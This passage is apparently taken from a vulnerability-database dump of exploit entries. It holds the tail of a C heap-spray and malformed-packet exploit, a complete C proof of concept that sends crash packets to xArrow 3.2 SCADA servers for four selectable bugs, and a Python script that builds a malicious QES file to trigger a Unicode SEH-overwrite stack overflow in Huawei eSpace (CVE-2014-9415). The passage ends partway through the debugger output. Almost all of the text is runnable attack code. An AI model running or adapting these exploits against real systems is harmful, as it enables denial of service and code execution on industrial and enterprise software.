putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32); // elements of the first array (numbers)\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, ELEMENTS, 32); // elements of the second array (strings)\r\n p += putxx(p, ELEMENTS, 32); // elements of the third array (strings\r\n break;\r\n }\r\n case 2: {\r\n type = 0x4b2;\r\n p += putxx(p, ELEMENTS, 32);\r\n break;\r\n }\r\n case 3: {\r\n type = 0x4b5;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, ELEMENTS, 32);\r\n break;\r\n }\r\n case 4: {\r\n type = 0xDAE;\r\n p += putxx(p, ELEMENTS, 32);\r\n break;\r\n }\r\n case 5: {\r\n type = 0x1bbc;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, ELEMENTS, 32);\r\n break;\r\n }\r\n default: {\r\n printf(\"\\nError: invalid bug number %d\\n\", bug);\r\n exit(1);\r\n break;\r\n }\r\n }\r\n\r\n // for this type of attack the data must be supplied before\r\n // the malformed packet so the following is useless\r\n //p += putcc(p, 0x41, BUFFSZ - (p - buff)); // good as string size too\r\n // send_gen automatically adjusts the size to 0x1ff4\r\n\r\n printf(\"- heap spray packets: \");\r\n fill = malloc(BUFFSZ);\r\n if(!fill) std_err();\r\n f = fill;\r\n f += putxx(f, 340, 32);\r\n f += putss(f, \"parameter\");\r\n f += putss(f, \"value\");\r\n for(i = 0; i < 340; i++) {\r\n f += putss(f, \"AAAA\");\r\n f += putss(f, \"AAAA\");\r\n f += putxx(f, 0x41414141, 32);\r\n f += putxx(f, 0x41414141, 32);\r\n f += putxx(f, 0x41414141, 32);\r\n }\r\n for(i = 0; i < 20; i++) {\r\n fputc('.', stdout);\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr 
*)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n send_gen(sd, 0x4b2, fill, f - fill);\r\n close(sd);\r\n }\r\n printf(\"\\n\");\r\n\r\n printf(\"- malformed packets: \");\r\n for(i = 0; i < 10; i++) {\r\n fputc('.', stdout);\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n send_gen(sd, type, buff, p - buff);\r\n close(sd);\r\n }\r\n printf(\"\\n\");\r\n\r\n printf(\"- done\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint send_gen(int sd, int type, u8 *data, int datasz) {\r\n static u8 buff[BUFFSZ];\r\n static int pck = 1;\r\n int t;\r\n u8 *p;\r\n\r\n t = 4 + 4 + 4 + datasz;\r\n if(t > (BUFFSZ - 12)) t = BUFFSZ - 12;\r\n\r\n p = buff;\r\n p += putxx(p, 1, 16);\r\n p += putxx(p, htons(pck++), 16);\r\n p += putxx(p, htonl(1), 32);\r\n p += putxx(p, htonl(t), 32);\r\n\r\n p += putxx(p, 1, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, type, 32);\r\n if(datasz > 0) p += putmm(p, data, datasz);\r\n\r\n if(send(sd, buff, p - buff, 0) < 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint putss(u8 *data, u8 *str) {\r\n int len;\r\n u8 *p;\r\n\r\n len = 0;\r\n if(str) len = strlen(str);\r\n\r\n p = data;\r\n if(len < 0xff) {\r\n p += putxx(p, len, 8);\r\n } else {\r\n p += putxx(p, 0xff, 8);\r\n p += putxx(p, len, 16);\r\n }\r\n p += putmm(p, str, len);\r\n return(p - data);\r\n}\r\n\r\n\r\n\r\nint putmm(u8 *data, u8 *str, int size) {\r\n if(size < 0) size = strlen(str);\r\n memcpy(data, str, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putcc(u8 *data, int chr, int size) {\r\n memset(data, chr, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putxx(u8 *data, u32 num, int bits) {\r\n int i,\r\n bytes;\r\n\r\n bytes = bits >> 3;\r\n for(i = 0; i < bytes; i++) {\r\n //data[i] = num >> ((bytes - 1 - i) << 3);\r\n data[i] = num >> (i << 3);\r\n }\r\n 
return(bytes);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18890"}, {"lastseen": "2018-01-04T17:10:36", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2012-07-01T00:00:00", "published": "2012-07-01T00:00:00", "id": "1337DAY-ID-18884", "href": "https://0day.today/exploit/description/18884", "type": "zdt", "title": "xArrow <= 3.2 multiple vulnerabilities", "sourceData": "-------------\r\n winerr.h\r\n-------------\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; 
break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n 
case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n-------------\r\n xarrow_1.c\r\n-------------\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n#include <zlib.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define BUFFSZ 8192 // max for recvfrom\r\n#define MAXZIPLEN(n)((n)+(((n)/1000)+1)+12)\r\n\r\n\r\n\r\nint create_socket(int type, struct sockaddr_in *peer);\r\nint xarrow_send_header(int sd, u32 zsize, u32 size);\r\nint xarrow_send(int sd, u8 *buff, u32 size);\r\nint xarrow_recv(int sd, u8 *buff, u32 buffsz);\r\nint tcp_recv(int sd, u8 *buff, int len);\r\nint putmm(u8 *data, u8 *mem, int len);\r\nint putcc(u8 *data, int chr, int len);\r\nint 
getxx(u8 *data, u32 *ret, int bits);\r\nint putxx(u8 *data, u32 num, int bits);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct sockaddr_in peer;\r\n int sd,\r\n i,\r\n bug,\r\n len;\r\n u16 port = 1975;\r\n u8 *buff,\r\n *host,\r\n *p;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"xArrow <= 3.2 multiple vulnerabilities \" VER \"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Usage: %s <bug> <host> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Bugs:\\n\"\r\n \"1 = decompression NULL pointer\\n\"\r\n \"2 = heap corruption\\n\"\r\n \"3 = invalid read access (udp port %d)\\n\"\r\n \"4 = memory corruption (udp port %d)\\n\"\r\n \"\\n\", argv[0], port,\r\n port - 1,\r\n port - 1);\r\n exit(1);\r\n }\r\n\r\n bug = atoi(argv[1]);\r\n host = argv[2];\r\n if(argc > 3) port = atoi(argv[3]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\",\r\n inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));\r\n\r\n buff = malloc(BUFFSZ);\r\n if(!buff) std_err();\r\n\r\n if(bug == 1) {\r\n sd = create_socket(IPPROTO_TCP, &peer);\r\n\r\n if(xarrow_send_header(sd, -1, 100) < 0) goto quit;\r\n\r\n p = buff;\r\n p += putcc(p, 'a', 100);\r\n if(send(sd, buff, p - buff, 0) < 0) goto quit;\r\n\r\n } else if(bug == 2) {\r\n sd = create_socket(IPPROTO_TCP, &peer);\r\n\r\n for(i = 0; i < 200; i++) {\r\n if(xarrow_send(sd, NULL, 0) < 0) goto quit;\r\n }\r\n\r\n } else if(bug == 3) {\r\n peer.sin_port = htons(ntohs(peer.sin_port) - 1);\r\n sd = create_socket(IPPROTO_UDP, &peer);\r\n\r\n p = buff;\r\n p += putxx(p, 0xffffffff, 32);\r\n p += putcc(p, 0, 6);\r\n p += putxx(p, !0, 32);\r\n p += 
putxx(p, 4, 16);\r\n p += putxx(p, 1, 16);\r\n p += putcc(p, 0, 20);\r\n p += putxx(p, 0x7f000001, 32); // 127.0.0.1, needed!\r\n p += putcc(p, 0, 10);\r\n p += putxx(p, 0xfffd, 16); // ((num << 4) + 0x20) & 0xffff\r\n p += putcc(p, 0, 64);\r\n\r\n printf(\"- send %d bytes\\n\", p - buff);\r\n for(i = 0; i < 3; i++) {\r\n if(sendto(sd, buff, p - buff, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n }\r\n goto quit;\r\n\r\n } else if(bug == 4) {\r\n peer.sin_port = htons(ntohs(peer.sin_port) - 1);\r\n sd = create_socket(IPPROTO_UDP, &peer);\r\n\r\n // all fields set to zero because they are not necessary\r\n p = buff;\r\n p += putxx(p, 0, 32);\r\n p += putcc(p, 0, 6);\r\n p += putxx(p, !0, 32);\r\n p += putxx(p, 4, 16);\r\n p += putxx(p, 1, 16);\r\n p += putcc(p, 0, 20);\r\n p += putxx(p, 0x7f000001, 32); // 127.0.0.1, needed!\r\n p += putcc(p, 0, 10);\r\n p += putxx(p, 0, 16);\r\n p += putcc(p, 0, BUFFSZ - (p - buff));\r\n putxx(buff, (p - buff) - 0x16, 32); // correct size\r\n\r\n printf(\"- send %d bytes\\n\", p - buff);\r\n for(i = 0; i < 3; i++) {\r\n if(sendto(sd, buff, p - buff, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n }\r\n goto quit;\r\n\r\n } else {\r\n printf(\"\\nError: invalid bug number (%d)\\n\", bug);\r\n exit(1);\r\n }\r\n\r\n for(;;) {\r\n len = xarrow_recv(sd, buff, BUFFSZ);\r\n if(len < 0) goto quit;\r\n }\r\n\r\nquit:\r\n printf(\"- done\\n\");\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint create_socket(int type, struct sockaddr_in *peer) {\r\n static struct linger ling = {1,1};\r\n static int on = 1;\r\n int sd;\r\n\r\n if(type == IPPROTO_TCP) {\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n if(connect(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in))\r\n < 0) std_err();\r\n printf(\"- connected\\n\");\r\n } else {\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n }\r\n setsockopt(sd, SOL_SOCKET, 
SO_LINGER, (char *)&ling, sizeof(ling));\r\n setsockopt(sd, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on));\r\n setsockopt(sd, IPPROTO_TCP, TCP_NODELAY, (char *)&on, sizeof(on));\r\n return(sd);\r\n}\r\n\r\n\r\n\r\nint xarrow_send_header(int sd, u32 zsize, u32 size) {\r\n int i;\r\n u8 header[6 + 12],\r\n *p;\r\n\r\n p = header;\r\n for(i = 0; i < 3; i++) {\r\n *p++ = 0xeb;\r\n *p++ = 0x90;\r\n }\r\n p += putxx(p, zsize, 32);\r\n p += putxx(p, size, 32);\r\n p += putxx(p, 0xeb90d709, 32);\r\n for(i = 6; i < sizeof(header); i++) {\r\n header[i] ^= 0x50 ^ 0x65 ^ 0x69; // yeah 0x5c\r\n }\r\n if(send(sd, header, sizeof(header), 0) != sizeof(header)) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint xarrow_send(int sd, u8 *buff, u32 size) {\r\n static u8 *zbuff = NULL;\r\n uLongf zsize;\r\n\r\n zsize = MAXZIPLEN(size);\r\n zbuff = realloc(zbuff, zsize);\r\n if(!zbuff) std_err();\r\n //if(!buff || !size) // compress it anyway!\r\n if(compress2(zbuff, &zsize, buff, size, 9) != Z_OK) return(-1);\r\n if(xarrow_send_header(sd, zsize, size) < 0) return(-1);\r\n if(send(sd, zbuff, zsize, 0) != zsize) return(-1);\r\n printf(\"- %u -> %u bytes sent\\n\", size, (u32)zsize);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint xarrow_recv(int sd, u8 *buff, u32 buffsz) {\r\n static u8 *zbuff = NULL;\r\n uLongf tmp;\r\n u32 zsize,\r\n size,\r\n type;\r\n int i;\r\n u8 header[6 + 12],\r\n *p;\r\n\r\n if(tcp_recv(sd, header, sizeof(header)) < 0) return(-1);\r\n p = header;\r\n for(i = 0; i < 3; i++) {\r\n if(*p != 0xeb) return(-2); p++;\r\n if(*p != 0x90) return(-3); p++;\r\n }\r\n for(i = 6; i < sizeof(header); i++) {\r\n header[i] ^= 0x5c;\r\n }\r\n p += getxx(p, &zsize, 32);\r\n p += getxx(p, &size, 32);\r\n p += getxx(p, &type, 32);\r\n if(type == 0xeb90d709) {\r\n if(zsize > buffsz) return(-4);\r\n zbuff = realloc(zbuff, zsize);\r\n if(!zbuff) std_err();\r\n if(tcp_recv(sd, zbuff, zsize) < 0) return(-5);\r\n tmp = size;\r\n if(uncompress(buff, &tmp, zbuff, zsize) != Z_OK) return(-6);\r\n 
} else { // in reality here it gets just rejected\r\n if(size > buffsz) return(-4);\r\n if(tcp_recv(sd, buff, size) < 0) return(-5);\r\n }\r\n printf(\"- %u -> %u bytes received\\n\", zsize, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint tcp_recv(int sd, u8 *buff, int len) {\r\n int t;\r\n u8 *p;\r\n\r\n for(p = buff; len; p += t, len -= t) {\r\n if(timeout(sd, 5) < 0) return(-1);\r\n t = recv(sd, p, len, 0);\r\n if(t <= 0) return(-1);\r\n }\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint putmm(u8 *data, u8 *mem, int len) {\r\n if(len < 0) len = strlen(mem) + 1;\r\n memcpy(data, mem, len);\r\n return(len);\r\n}\r\n\r\n\r\n\r\nint putcc(u8 *data, int chr, int len) {\r\n memset(data, chr, len);\r\n return(len);\r\n}\r\n\r\n\r\n\r\nint getxx(u8 *data, u32 *ret, int bits) {\r\n u32 num;\r\n int i,\r\n bytes;\r\n\r\n if(bits <= 4) bytes = bits;\r\n else bytes = bits >> 3;\r\n for(num = i = 0; i < bytes; i++) {\r\n num |= (data[i] << (i << 3));\r\n }\r\n *ret = num;\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nint putxx(u8 *data, u32 num, int bits) {\r\n int i,\r\n bytes;\r\n\r\n if(bits <= 4) bytes = bits;\r\n else bytes = bits >> 3;\r\n for(i = 0; i < bytes; i++) {\r\n data[i] = num >> (i << 3);\r\n }\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n }\r\n host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\n\n# 0day.today 
[2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18884"}], "packetstorm": [{"lastseen": "2019-05-21T03:38:40", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-17T00:00:00", "published": "2019-05-17T00:00:00", "id": "PACKETSTORM:152965", "href": "https://packetstormsecurity.com/files/152965/Huawei-eSpace-1.1.11.103-Unicode-Stack-Buffer-Overflow.html", "title": "Huawei eSpace 1.1.11.103 Unicode Stack Buffer Overflow", "type": "packetstorm", "sourceData": "`#!/usr/bin/env python \n# -*- coding: utf-8 -*- \n# \n# Huawei eSpace Meeting cenwpoll.dll Unicode Stack Buffer Overflow with SEH Overwrite \n# \n# \n# Vendor: Huawei Technologies Co., Ltd. \n# Product web page: https://www.huawei.com \n# Affected application: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC) \n# Affected application: Mobile Office eConference V200R003C01 6.0.0.268.v67290 \n# Affected module: cenwpoll.dll 1.0.8.8 \n# Binaries affected: mcstub.exe, classreader.exe, offlinepolledit.exe, eSpace.exe \n# \n# Product description: \n# -------------------- \n# 1. Create more convenient Enhanced Communications (EC) services for your enterprise with this suite of \n# products. Huawei\u2019s EC Suite (ECS) solution combines voice, data, video, and service streams, and provides \n# users with easy and secure access to their service platform from any device, in any place, at any time. \n# 2. The eSpace Meeting allows you to join meetings that support voice, data, and video functions using \n# the PC client, the tablet client, or an IP phone, or in a meeting room with an MT deployed. \n# \n# Vulnerability description: \n# -------------------------- \n# eSpace Meeting is prone to a stack-based buffer overflow vulnerability (seh overwrite) because it fails \n# to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer when \n# handling QES files. 
Attackers can exploit this issue to execute arbitrary code within the context of \n# the affected application. Failed exploit attempts will likely result in denial-of-service conditions. \n# \n# Tested on: \n# ---------- \n# OS Name: Microsoft Windows 7 Professional \n# OS Version: 6.1.7601 Service Pack 1 Build 7601 \n# RAM 4GB, System type: 32bit, Processor: Intel(R) Core(TM) i5-4300U CPU 1.90GHz 2.50GHz \n# \n# Vulnerability discovered by: \n# ---------------------------- \n# Gjoko 'LiquidWorm' Krstic \n# Senior STTE \n# SCD-ERC \n# Munich, Germany \n# 26th of August (Tuesday), 2014 \n# \n# PSIRT details: \n# -------------- \n# Security advisory No.: Huawei-SA-20141217- espace \n# Initial release date: Dec 17, 2014 \n# Vulnerability ID: HWPSIRT-2014-1151 \n# CVE ID: CVE-2014-9415 \n# Patched version: eSpace Meeting V100R001C03 \n# Advisory URL: https://www.huawei.com/en/psirt/security-advisories/hw-406589 \n# \n# \n# ------------------------------------ WinDBG output ------------------------------------ \n# \n# m_dwCurrentPos = 0 ,dwData = 591 ,m_dwGrowSize = 4096(1db0.1828): Access violation - code c0000005 (first chance) \n# First chance exceptions are reported before any exception handling. \n# This exception may be expected and handled. \n# eax=00000000 ebx=00410041 ecx=00000000 edx=00000578 esi=08de1ad8 edi=00410045 \n# eip=05790f3e esp=02fc906c ebp=02fecd00 iopl=0 nv up ei pl zr na pe nc \n# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 \n# *** WARNING: Unable to verify checksum for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\cenwpoll.dll \n# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\cenwpoll.dll - \n# cenwpoll!DllUnregisterServer+0xa59e: \n# 05790f3e 8178082c010000 cmp dword ptr [eax+8],12Ch ds:0023:00000008=???????? 
\n# 0:008> !exchain \n# 02feccf4: *** WARNING: Unable to verify checksum for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\mcstub.exe \n# *** ERROR: Module load completed but symbols could not be loaded for C:\\Program Files\\eSpace-ecs\\conf\\cwbin\\mcstub.exe \n# mcstub+10041 (00410041) \n# Invalid exception stack at 00410041 \n# Instruction Address: 0x0000000005790f3e \n# \n# Description: Exception Handler Chain Corrupted \n# Short Description: ExceptionHandlerCorrupted \n# Exploitability Classification: EXPLOITABLE \n# Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at cenwpoll!DllUnregisterServer+0x000000000000a59e (Hash=0xbc5aacab.0x6c23bb0b) \n# \n# Corruption of the exception handler chain is considered exploitable \n# \n# 0:008> d ebp \n# 02fecd00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n# 02fecd10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n# 02fecd20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n# 02fecd30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n# 02fecd40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n# 02fecd50 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n# 02fecd60 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. \n# 02fecd70 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 
\n# 0:008> u ebp \n# 02fecd00 41 inc ecx \n# 02fecd01 004100 add byte ptr [ecx],al \n# 02fecd04 41 inc ecx \n# 02fecd05 004100 add byte ptr [ecx],al \n# 02fecd08 41 inc ecx \n# 02fecd09 004100 add byte ptr [ecx],al \n# 02fecd0c 41 inc ecx \n# 02fecd0d 004100 add byte ptr [ecx],al \n# \n# ------------------------------------ /WinDBG output ------------------------------------ \n# \n# \n \nimport sys, os, time \n \nos.system('title jterm') \nos.system('color f5') \nos.system('cls') \npiton = os.path.basename(sys.argv[0]) \n \ndef usage(): \nprint ''' \n+---------------------------------------------+ \n| eSpace Meeting Stack Buffer Overflow Vuln | \n| | \n| Vuln ID: HWPSIRT-2014-1151 | \n| CVE ID: CVE-2014-9415 | \n+---------------------------------------------+ \n''' \nif len(sys.argv) < 2: \nprint 'Usage: \\n\\n\\t'+piton+' <OPTION>' \nprint '\\nOPTION:\\n' \nprint '\\t0 - Create the evil PoC file.' \nprint '\\t1 - Create the evil file, start the vulnerable application and crash it.' \nprint '\\t2 - Create the evil file, start the vulnerable application under Windows Debugger with SEH chain info.\\n' \nquit() \n \nusage() \ncrash = sys.argv[1] \n \ndir = os.getcwd(); \nfile = \"evilpoll.qes\" \nheader = '\\x56\\x34\\x78\\x12\\x01\\x00\\x09\\x00' # V4x..... \n \ntime.sleep(1) \n# Overwrite FS:[0] chain (\\x43 = EIP) \nbuffer = '\\x41' * 353 +'\\x42' * 2 +'\\x43' * 2 +'\\x44' * 42 +'New Poll' # \\x44 can be incremented (byte space for venetian shellcode) \nbuffer += '\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x90' \nbuffer += '\\x85\\xA9\\xD7\\x00\\x01\\x04\\x00' \nbuffer += 'TEST'+'\\x01\\x02\\x05\\x00' \nbuffer += 'ANSW1'+'\\x05\\x00' \nbuffer += 'ANSW2' \n \npoc = header + buffer \nbytes = len(poc) \n \nprint '[+] Creating evil PoC file...' 
\ntime.sleep(1) \nprint '[+] Buffering:\\n' \ntime.sleep(1) \n \nindex = 0 \nwhile index < len(poc): \nchar = poc[index] \n#print char, \nsys.stdout.write(char) \ntime.sleep(10.0 / 1000.0) \nindex = index + 1 \n \ntry: \nwriteFile = open (file, 'w') \nwriteFile.write( poc ) \nwriteFile.close() \ntime.sleep(1) \nprint '\\n\\n[+] File \\\"'+file+'\\\" successfully created!' \ntime.sleep(1) \nprint '[+] Location: \"'+dir+'\"' \nprint '[+] Wrote '+str(bytes)+' bytes.' \nexcept: \nprint '[-] Error while creating file!\\n' \n \nif crash == '0': \nprint '\\n\\n[+] Done!\\n' \nelif crash == '1': \nprint '[+] The script will now execute the vulnerable application with the PoC file as its argument.\\n' \nos.system('pause') \nos.system('C:\\\\Progra~1\\\\eSpace-ecs\\\\conf\\\\cwbin\\\\classreader.exe \"%~dp0evilpoll.qes\"') \nelif crash == '2': \nprint '[+] The script will now execute the vulnerable application with the PoC file as its argument under Windows Debugger.\\n' \nos.system('pause') \nos.system('C:\\\\Progra~1\\\\Debugg~1\\\\windbg.exe -Q -g -c \"!exchain\" -o \"C:\\\\Progra~1\\eSpace-ecs\\conf\\cwbin\\classreader.exe\" \"%~dp0evilpoll.qes\"') \nprint '\\n[+] You should see something like this in WinDBG:' \nprint ''' \n0:000> d 0012e37c \n0012e37c 42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00 B.B.C.C.D.D.D.D. \n0012e38c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D. \n0012e39c 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D. \n0012e3ac 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D. 